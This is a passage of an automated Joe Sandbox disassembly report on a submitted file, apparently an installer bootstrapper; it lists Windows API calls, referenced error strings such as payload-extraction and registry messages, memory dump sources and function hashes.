                                                                                                                                                                                                                                                                                                  • Failed to format variable string., xrefs: 00869B06
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00869B7A
                                                                                                                                                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00869B54
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1811509786-402580132
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00880CC4
                                                                                                                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00880CD6
                                                                                                                                                                                                                                                                                                  • SetFileTime.KERNEL32(?,?,?,?), ref: 00880CE9
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,008808B1,?,?), ref: 00880CF8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Invalid operation for this state., xrefs: 00880C9D
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880C93
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                                                                                                                                                  • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 609741386-1751360545
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,0087539D), ref: 00874AC3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • pipe.cpp, xrefs: 00874AFB
                                                                                                                                                                                                                                                                                                  • Failed to allocate message to write., xrefs: 00874AA2
                                                                                                                                                                                                                                                                                                  • Failed to write message type to pipe., xrefs: 00874B05
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 00874A7D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3934441357-606776022
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 00874693
                                                                                                                                                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 008746A6
                                                                                                                                                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 008746C1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _memcpy_s$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 886498622-766083570
                                                                                                                                                                                                                                                                                                  • Opcode ID: 68263e0ddc1463203eb6f56b48175d9a4771a9fa762e3b78276d5c3e68d36231
                                                                                                                                                                                                                                                                                                  • Instruction ID: d8e0b6f59432e6d556ec625604ce8e0bac78f699d6978c58ff86137a4352e29f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68263e0ddc1463203eb6f56b48175d9a4771a9fa762e3b78276d5c3e68d36231
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55119EB250430EABDB01AE98DC82DEB77ACFF15B10B014526FA15DB241EB71E654CBE1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                                                                  • API String ID: 0-1718035505
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f345a934d470c0fe0da97973e9401c0596ad76b2e99806b2876d4e95a6cc0e1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 99e6ca0e7c440a47c3c60fa0ff8658b4b60b851d0ca40d2e5e9c12cc88b4ec84
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f345a934d470c0fe0da97973e9401c0596ad76b2e99806b2876d4e95a6cc0e1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01F97166A6229B6F200E655CD5E9727A8FA23396314007ED5B5D3A00EB61C84496A0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32$procutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4275029093-1586155540
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1442a507bd6d832e3eaef3a3d21f17696cd78b7dc1e77ba02857f38f9671f132
                                                                                                                                                                                                                                                                                                  • Instruction ID: b7126aff9e2b0e695b0569bade5c981bd959b042d3a700da9b6ddef6c142bb53
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1442a507bd6d832e3eaef3a3d21f17696cd78b7dc1e77ba02857f38f9671f132
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFF0C872E00639A7E7209B958D09E9BBF68FF06761B114164BD14E7780EB74DD01CBE0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00893479,00893479,?,?,?,0089A45C,00000001,00000001,ECE85006), ref: 0089A265
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0089A45C,00000001,00000001,ECE85006,?,?,?), ref: 0089A2EB
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0089A3E5
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0089A3F2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0089521A: HeapAlloc.KERNEL32(00000000,?,?,?,00891F87,?,0000015D,?,?,?,?,008933E0,000000FF,00000000,?,?), ref: 0089524C
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0089A3FB
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0089A420
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3147120248-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4d5cbd84d95d5533b0441ff9440ab2598a0b5867735228d65280926102668303
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4982f7ac305c3a1018356220cee2df875ce5ae91a22db0d47f08105ad22425ce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d5cbd84d95d5533b0441ff9440ab2598a0b5867735228d65280926102668303
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E51E472610216AFEF29AF68CC41EBF77A9FB44750F1D4629FC05D6240DB35DC80A692
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 00878D18
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                                                                  • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                                                                                                                                                                                                                                                                  • API String ID: 3472027048-398165853
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0434f1d7b758a568ca75fb942feef053446fb461847bdde1afcdddc79e15db83
                                                                                                                                                                                                                                                                                                  • Instruction ID: ada54c0a34fb585c5d273374eccf75ff32733a389c462449410acfd6df213f85
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0434f1d7b758a568ca75fb942feef053446fb461847bdde1afcdddc79e15db83
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13310932980615FBEB3265588C4AFBF6A5CFF20750F118015FD08F7285EA38CD1056A2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 0087E985
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0087E994
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 0087E9A8
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0087E9B8
                                                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0087E9D2
                                                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0087EA31
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3812958022-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4412a745a005d7a42f92d45d582931db9358ab12050a8135d0eba08d78f786b4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 83e8acf30ff3c9175780ad4a552d11634634c24df85be7e52616edd937bd84c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4412a745a005d7a42f92d45d582931db9358ab12050a8135d0eba08d78f786b4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7921E072100218BFDF119F68DC48EAA7FA5FF59310F108218FA0ADA2A9C331DD10DB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to save state., xrefs: 0087C891
                                                                                                                                                                                                                                                                                                  • elevation.cpp, xrefs: 0087C9B8
                                                                                                                                                                                                                                                                                                  • Unexpected elevated message sent to child process, msg: %u, xrefs: 0087C9C4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandleMutexRelease
                                                                                                                                                                                                                                                                                                  • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4207627910-1576875097
                                                                                                                                                                                                                                                                                                  • Opcode ID: cb3a83a530ef967e1d443943384756372ff3f2b7b281e5630759a7675e9b12c3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 158d25a9a42131e51938717bec199a6d808f5b020b1dc7789773c849415e77ff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb3a83a530ef967e1d443943384756372ff3f2b7b281e5630759a7675e9b12c3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7361B23A100614EFCB125F84CD41D59BFA2FF08714715C459FAAD9B636C732E821EB46
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008A123F
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008770E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008A1276
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 008A136E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3790715954-1648651458
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e8361191c08b532aef678c2bd3dc23f9bd6a0a5d0f60c1de50ad557ffeb0eaa
                                                                                                                                                                                                                                                                                                  • Instruction ID: 38ea0a3c0e836bdf60226e7af165692c0b8ecb74684bfe64939de7d90a4d6aec
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e8361191c08b532aef678c2bd3dc23f9bd6a0a5d0f60c1de50ad557ffeb0eaa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31418F35A0021AEFEF21DF95C849EAEB7BAFF56710F154169E901EBB00D634DD009BA0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00878770,00000000,00000000,00000000,00000000,00000000), ref: 008A4925
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A490D: GetLastError.KERNEL32(?,?,?,00878770,00000000,00000000,00000000,00000000,00000000), ref: 008A492F
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,008A5C09,?,?,?,?,?,?,?,00010000,?), ref: 008A63C0
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,008A5C09,?,?,?,?), ref: 008A6412
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008A6458
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008A647E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$Write$Pointer
                                                                                                                                                                                                                                                                                                  • String ID: dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 133221148-2067379296
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3d0dc9c65b46c434f39a9566913ef17175ee69673586e97789b129333885ada6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ca4666d3273da414e53aa799310baae6a16693f73a65ba3935c11458601fb99
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d0dc9c65b46c434f39a9566913ef17175ee69673586e97789b129333885ada6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3241BD7290122ABFFF218E94CC45BAA7B68FF09720F184225FD00E6590E371DC20DBA4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 0088ADB3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to extract payload: %ls from container: %ls, xrefs: 0088AE3E
                                                                                                                                                                                                                                                                                                  • Failed to extract all payloads from container: %ls, xrefs: 0088ADF7
                                                                                                                                                                                                                                                                                                  • Failed to open container: %ls., xrefs: 0088AD85
                                                                                                                                                                                                                                                                                                  • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 0088AE4A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-3891707333
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d34ec1fe97409011a8b6072c0d5d5fdb6bf0da475016ff1a53ebdb00b7ea364
                                                                                                                                                                                                                                                                                                  • Instruction ID: a5549f3e4b028327c4f8cd29acf46d9c46fb550e45b5de99d7e07f86e2c650d7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d34ec1fe97409011a8b6072c0d5d5fdb6bf0da475016ff1a53ebdb00b7ea364
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4331E432C00219ABDF21BAE8CC46EDE7768FF04710F114512F910E66D1E731AA14DBE2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,00870654,00000001,00000001,00000001,00870654,00000000), ref: 0086F07D
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,00870654,00000001,00000001,00000001,00870654,00000000,00000001,00000000,?,00870654,00000001), ref: 0086F09A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format key for update registration., xrefs: 0086F033
                                                                                                                                                                                                                                                                                                  • Failed to remove update registration key: %ls, xrefs: 0086F0C7
                                                                                                                                                                                                                                                                                                  • PackageVersion, xrefs: 0086F05E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                                                                                                                                                                                                                                                  • API String ID: 446873843-3222553582
                                                                                                                                                                                                                                                                                                  • Opcode ID: 909c89d4f45232c807644354149f98bf5ceffa15d77209df275cf7595d38b0dd
                                                                                                                                                                                                                                                                                                  • Instruction ID: fe0be8a114536548c97d5fa361e98650fb48d29e380b0fab049c8b1f296b7118
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 909c89d4f45232c807644354149f98bf5ceffa15d77209df275cf7595d38b0dd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D218635900529BBDB219BA9DC49FAEBEB8FF05720F110275F914E2152E7359A40CA92
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindFirstFileW.KERNEL32(0088923A,?,00000100,00000000,00000000), ref: 008A447B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4440: FindClose.KERNEL32(00000000), ref: 008A4487
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 008A4430
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A1217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008A123F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A1217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008770E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008A1276
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseFindQueryValue$FileFirstOpen
